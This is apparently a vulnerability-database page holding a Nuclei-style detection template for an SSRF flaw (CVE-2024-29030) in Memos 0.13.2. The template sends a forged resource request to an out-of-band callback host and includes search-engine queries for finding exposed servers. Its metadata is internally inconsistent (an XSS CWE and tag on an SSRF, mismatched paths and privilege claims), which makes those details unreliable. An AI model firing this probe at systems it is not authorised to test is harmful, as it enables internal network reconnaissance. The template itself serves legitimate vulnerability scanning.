漏洞描述
An SSRF vulnerability exists at the `/api/resource` that allows authenticated users to enumerate the internal network.
CVE-2024-29030: Memos 0.13.2 - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2024-29030
info:
name: Memos 0.13.2 - Server-Side Request Forgery
author: ritikchaddha
severity: medium
description: |
An SSRF vulnerability exists at the `/api/resource` that allows authenticated users to enumerate the internal network.
reference:
- https://securitylab.github.com/advisories/GHSL-2023-154_GHSL-2023-156_memos/
- https://nvd.nist.gov/vuln/detail/CVE-2024-29030
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: title:"Memos"
fofa-query: title="Memos"
tags: cve,cve2024,xss,memos,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/o/get/resource?url=https://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(tolower(body), "memos")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022053fa1b170d3a9fc47dac833bf68a28ea0fed5aae8cf7a881922e67748f49360e022100ba6cb3e45ce75e71e06f20bb40d8f95e7b6909ebfe04cf93edcec4e31174d7ef:922c64590222798bb761d5b6d8e72950